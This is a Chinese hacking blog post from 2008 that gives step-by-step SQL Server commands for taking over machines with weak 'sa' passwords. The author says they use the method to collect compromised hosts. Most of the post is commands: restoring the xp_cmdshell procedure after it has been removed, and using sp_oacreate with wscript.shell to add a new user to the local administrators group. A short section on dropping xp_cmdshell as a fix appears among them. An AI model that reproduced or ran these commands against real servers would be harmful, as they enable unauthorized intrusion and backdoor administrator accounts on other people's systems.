利用SQL分离器实现sa弱口令强行入侵 - 朝气
当前位置: 首页 > 学习天地 > 正文

利用SQL分离器实现sa弱口令强行入侵

我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。 下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。 注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。 一.更改sa口令方法: 用sql综合利用工具连接后,执行命令:exec sp_password NULL,’新密码’,’sa’ (提示:慎用!) 二.简单修补sa弱口令: 方法1:查询分离器连接后执行: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and OBJECTPROPERTY(id, N’IsExtendedProc’) = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’ GO 然后按F5键命令执行完毕。 方法2:查询分离器连接后 第一步执行:use master, 第二步执行:sp_dropextendedproc ‘xp_cmdshell’, 然后按F5键命令执行完毕。 三.常见情况恢复执行xp_cmdshell: 1 未能找到存储过程’master..xpcmdshell’。 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int, 第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’, 然后按F5键命令执行完毕。 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc “xp_cmdshell”, 第二步执行:sp_addextendedproc ‘xp_cmdshell’,’xpsql70.dll’ 然后按F5键命令执行完毕。 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’ 第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,’xpweb70.dll’ 然后按F5键命令执行完毕。 四.终极方法: 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, 2000servser系统: declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add’ declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add’ xp或2003server系统: declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’ declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add’

 

转载请注明转自朝气 ,本文链接: http://www.gtsow.com/artices/19.html

该日志由 逝魂 于2008年06月04日发表在学习天地分类下,
您还可以在保留本文地址和作者的前提下转载到您的网站或空间。

报歉!评论已关闭.